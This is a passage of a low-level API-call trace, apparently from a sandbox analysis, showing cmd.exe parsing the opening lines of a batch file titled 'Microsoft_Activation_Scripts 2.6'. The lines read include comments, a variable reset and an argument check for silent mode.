lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d82 [0179.527] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0179.527] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7694, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e0e [0179.527] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::========================================================================================================================================\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="::========================================================================================================================================\r\n") returned 140 [0179.527] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.527] GetFileType (hFile=0xa0) returned 0x1 [0179.527] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.527] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e0e [0179.527] GetProcessHeap () returned 0x19a8f1e0000 [0179.527] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0179.527] GetProcessHeap () returned 0x19a8f1e0000 [0179.528] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0179.528] _tell (_FileHandle=3) returned 7694 [0179.528] _close (_FileHandle=3) returned 0 [0179.528] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.528] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0179.528] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.528] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7694, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e0e [0179.528] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.528] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e0e [0179.528] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0179.528] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7696, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e10 [0179.528] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n========================================================================================================================================\r\n") returned 2 [0179.528] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.528] GetFileType (hFile=0xa0) returned 0x1 [0179.528] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.528] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e10 [0179.529] GetProcessHeap () returned 0x19a8f1e0000 [0179.529] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0179.529] GetProcessHeap () returned 0x19a8f1e0000 [0179.530] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0179.530] _tell (_FileHandle=3) returned 7696 [0179.530] _close (_FileHandle=3) returned 0 [0179.530] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.530] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0179.530] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.530] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7696, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e10 [0179.530] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.530] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e10 [0179.530] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0179.530] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7747, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e43 [0179.530] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":: Run script with parameters in unattended mode\r\n", cbMultiByte=51, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=":: Run script with parameters in unattended mode\r\n=======================================================================================\r\n") returned 51 [0179.530] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.530] GetFileType (hFile=0xa0) returned 0x1 [0179.531] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.531] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e43 [0179.531] GetProcessHeap () returned 0x19a8f1e0000 [0179.531] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0179.531] GetProcessHeap () returned 0x19a8f1e0000 [0179.532] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0179.532] _tell (_FileHandle=3) returned 7747 [0179.532] _close (_FileHandle=3) returned 0 [0179.532] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.532] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0179.532] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.532] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7747, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e43 [0179.532] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.532] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e43 [0179.532] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0179.533] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7749, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e45 [0179.533] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n Run script with parameters in unattended mode\r\n=======================================================================================\r\n") returned 2 [0179.533] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.533] GetFileType (hFile=0xa0) returned 0x1 [0179.533] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.533] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e45 [0179.533] GetProcessHeap () returned 0x19a8f1e0000 [0179.533] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0179.533] GetProcessHeap () returned 0x19a8f1e0000 [0179.534] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0179.535] _tell (_FileHandle=3) returned 7749 [0179.535] _close (_FileHandle=3) returned 0 [0179.536] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.536] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0179.536] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.536] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7749, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e45 [0179.536] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.536] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e45 [0179.536] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0179.536] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7761, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e51 [0179.536] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set _elev=\r\n", cbMultiByte=12, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set _elev=\r\npt with parameters in unattended mode\r\n=======================================================================================\r\n") returned 12 [0179.536] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.536] GetFileType (hFile=0xa0) returned 0x1 [0179.536] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.536] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e51 [0179.536] GetProcessHeap () returned 0x19a8f1e0000 [0179.536] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0179.536] GetProcessHeap () returned 0x19a8f1e0000 [0179.538] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0179.538] _wcsicmp (_String1="set", _String2=")") returned 74 [0179.538] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0179.538] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0179.538] _wcsicmp (_String1="IF", _String2="set") returned -10 [0179.538] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0179.538] _wcsicmp (_String1="REM", _String2="set") returned -1 [0179.538] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0179.538] GetProcessHeap () returned 0x19a8f1e0000 [0179.538] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee850 [0179.538] GetProcessHeap () returned 0x19a8f1e0000 [0179.538] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec9a0 [0179.538] GetProcessHeap () returned 0x19a8f1e0000 [0179.538] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb740 [0179.538] _tell (_FileHandle=3) returned 7761 [0179.538] _close (_FileHandle=3) returned 0 [0179.538] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0179.538] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0179.539] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0179.539] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0179.539] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0179.539] _wcsicmp (_String1="set", _String2="CD") returned 16 [0179.539] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0179.539] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0179.539] _wcsicmp (_String1="set", _String2="REN") returned 1 [0179.539] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0179.539] _wcsicmp (_String1="set", _String2="SET") returned 0 [0179.539] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0179.540] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0179.540] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0179.540] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0179.540] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0179.540] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0179.540] _wcsicmp (_String1="set", _String2="CD") returned 16 [0179.540] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0179.540] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0179.540] _wcsicmp (_String1="set", _String2="REN") returned 1 [0179.540] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0179.540] _wcsicmp (_String1="set", _String2="SET") returned 0 [0179.540] GetProcessHeap () returned 0x19a8f1e0000 [0179.540] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x30) returned 0x19a8f1e0970 [0179.540] GetProcessHeap () returned 0x19a8f1e0000 [0179.540] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e0970, Size=0x1e) returned 0x19a8f1eb800 [0179.540] GetProcessHeap () returned 0x19a8f1e0000 [0179.540] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb800) returned 0x1e [0179.540] wcsncmp (_String1="_ele", _String2="/", _MaxCount=0x4) returned 48 [0179.540] GetProcessHeap () returned 0x19a8f1e0000 [0179.540] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb770 [0179.540] _wcsnicmp (_String1="_e", _String2="/A", _MaxCount=0x2) returned 48 [0179.540] _wcsnicmp (_String1="_e", _String2="/P", _MaxCount=0x2) returned 48 [0179.540] SetEnvironmentVariableW (lpName="_elev", lpValue=0x0) returned 1 [0179.540] GetProcessHeap () returned 0x19a8f1e0000 [0179.541] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f215dc0) returned 1 [0179.541] GetEnvironmentStringsW () returned 0x19a8f2029e0* [0179.542] GetProcessHeap () returned 0x19a8f1e0000 [0179.542] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfbe) returned 0x19a8f206860 [0179.542] memcpy (in: _Dst=0x19a8f206860, _Src=0x19a8f2029e0, _Size=0xfbe | out: _Dst=0x19a8f206860) returned 0x19a8f206860 [0179.542] FreeEnvironmentStringsA (penv="=") returned 1 [0179.542] _get_osfhandle (_FileHandle=1) returned 0x24 [0179.542] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0179.542] _get_osfhandle (_FileHandle=1) returned 0x24 [0179.542] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0179.543] _get_osfhandle (_FileHandle=0) returned 0x20 [0179.543] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0179.543] SetConsoleInputExeNameW () returned 0x1 [0179.544] GetConsoleOutputCP () returned 0x1b5 [0179.544] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0179.544] SetThreadUILanguage (LangId=0x0) returned 0x409 [0179.544] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.545] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0179.545] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.545] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7761, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e51 [0179.545] GetProcessHeap () returned 0x19a8f1e0000 [0179.545] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb770) returned 1 [0179.545] GetProcessHeap () returned 0x19a8f1e0000 [0179.545] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb800) returned 1 [0179.545] GetProcessHeap () returned 0x19a8f1e0000 [0179.546] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb740) returned 1 [0179.546] GetProcessHeap () returned 0x19a8f1e0000 [0179.546] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec9a0) returned 1 [0179.546] GetProcessHeap () returned 0x19a8f1e0000 [0179.546] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee850) returned 1 [0179.546] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.546] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e51 [0179.547] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0179.547] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7858, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1eb2 [0179.547] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if defined _args echo \"%_args%\" | find /i \"/S\" %nul% && (set \"_silent=%nul%\") || (set _silent=)\r\n", cbMultiByte=97, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="if defined _args echo \"%_args%\" | find /i \"/S\" %nul% && (set \"_silent=%nul%\") || (set _silent=)\r\n=========================================\r\n") returned 97 [0179.547] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.547] GetFileType (hFile=0xa0) returned 0x1 [0179.547] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.547] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1eb2 [0179.547] GetProcessHeap () returned 0x19a8f1e0000 [0179.547] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f207830 [0179.547] GetProcessHeap () returned 0x19a8f1e0000 [0179.547] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20d9b0 [0179.547] GetProcessHeap () returned 0x19a8f1e0000 [0179.547] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb800 [0179.547] GetEnvironmentVariableW (in: lpName="_args", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0179.547] _wcsicmp (_String1="_args", _String2="CD") returned -4 [0179.547] _wcsicmp (_String1="_args", _String2="ERRORLEVEL") returned -6 [0179.547] _wcsicmp (_String1="_args", _String2="CMDEXTVERSION") returned -4 [0179.547] _wcsicmp (_String1="_args", _String2="CMDCMDLINE") returned -4 [0179.547] _wcsicmp (_String1="_args", _String2="DATE") returned -5 [0179.547] _wcsicmp (_String1="_args", _String2="TIME") returned -21 [0179.547] _wcsicmp (_String1="_args", _String2="RANDOM") returned -19 [0179.547] _wcsicmp (_String1="_args", _String2="HIGHESTNUMANODENUMBER") returned -9 [0179.548] GetProcessHeap () returned 0x19a8f1e0000 [0179.548] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb800) returned 1 [0179.548] GetProcessHeap () returned 0x19a8f1e0000 [0179.548] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0179.549] GetProcessHeap () returned 0x19a8f1e0000 [0179.549] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20d9b0 [0179.549] GetProcessHeap () returned 0x19a8f1e0000 [0179.549] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec780 [0179.549] GetEnvironmentVariableW (in: lpName="nul", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x9 [0179.549] GetProcessHeap () returned 0x19a8f1e0000 [0179.549] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec780) returned 1 [0179.549] GetProcessHeap () returned 0x19a8f1e0000 [0179.550] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0179.551] GetProcessHeap () returned 0x19a8f1e0000 [0179.551] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20d9b0 [0179.551] GetProcessHeap () returned 0x19a8f1e0000 [0179.551] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec700 [0179.551] GetEnvironmentVariableW (in: lpName="nul", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x9 [0179.551] GetProcessHeap () returned 0x19a8f1e0000 [0179.551] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec700) returned 1 [0179.551] GetProcessHeap () returned 0x19a8f1e0000 [0179.552] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0179.552] GetProcessHeap () returned 0x19a8f1e0000 [0179.553] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207830) returned 1 [0179.553] _wcsicmp (_String1="if", _String2=")") returned 64 [0179.554] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0179.554] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0179.554] _wcsicmp (_String1="IF", _String2="if") returned 0 [0179.554] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0179.554] GetProcessHeap () returned 0x19a8f1e0000 [0179.554] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee3d0 [0179.554] GetProcessHeap () returned 0x19a8f1e0000 [0179.554] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ec900 [0179.554] GetProcessHeap () returned 0x19a8f1e0000 [0179.554] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x30) returned 0x19a8f1e0ef0 [0179.554] GetProcessHeap () returned 0x19a8f1e0000 [0179.554] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e0ef0, Size=0x22) returned 0x19a8f1eb800 [0179.554] GetProcessHeap () returned 0x19a8f1e0000 [0179.554] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb800) returned 0x22 [0179.554] _wcsicmp (_String1="defined", _String2="/I") returned 53 [0179.554] GetProcessHeap () returned 0x19a8f1e0000 [0179.554] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edb90 [0179.554] GetProcessHeap () returned 0x19a8f1e0000 [0179.554] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb6b0 [0179.554] _wcsicmp (_String1="ERRORLEVEL", _String2="defined") returned 1 [0179.554] _wcsicmp (_String1="EXIST", _String2="defined") returned 1 [0179.554] _wcsicmp (_String1="CMDEXTVERSION", _String2="defined") returned -1 [0179.554] _wcsicmp (_String1="DEFINED", _String2="defined") returned 0 [0179.554] GetProcessHeap () returned 0x19a8f1e0000 [0179.554] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb6e0 [0179.554] GetProcessHeap () returned 0x19a8f1e0000 [0179.554] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb770 [0179.554] GetProcessHeap () returned 0x19a8f1e0000 [0179.554] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb770, Size=0x1e) returned 0x19a8f1eb8f0 [0179.554] GetProcessHeap () returned 0x19a8f1e0000 [0179.554] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb8f0) returned 0x1e [0179.554] _wcsicmp (_String1="echo", _String2=")") returned 60 [0179.555] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0179.555] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0179.555] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0179.555] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0179.555] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0179.555] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0179.555] GetProcessHeap () returned 0x19a8f1e0000 [0179.555] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edc50 [0179.555] GetProcessHeap () returned 0x19a8f1e0000 [0179.555] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb710 [0179.555] GetProcessHeap () returned 0x19a8f1e0000 [0179.555] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb950 [0179.555] GetProcessHeap () returned 0x19a8f1e0000 [0179.555] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edd10 [0179.555] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0179.555] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0179.555] _wcsicmp (_String1="IF", _String2="find") returned 3 [0179.555] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0179.555] _wcsicmp (_String1="REM", _String2="find") returned 12 [0179.555] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0179.555] GetProcessHeap () returned 0x19a8f1e0000 [0179.555] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1eddd0 [0179.555] GetProcessHeap () returned 0x19a8f1e0000 [0179.555] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb920 [0179.555] GetProcessHeap () returned 0x19a8f1e0000 [0179.555] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x24) returned 0x19a8f1eb980 [0179.556] GetProcessHeap () returned 0x19a8f1e0000 [0179.556] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0a70 [0179.556] GetProcessHeap () returned 0x19a8f1e0000 [0179.556] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecaa0 [0179.556] GetProcessHeap () returned 0x19a8f1e0000 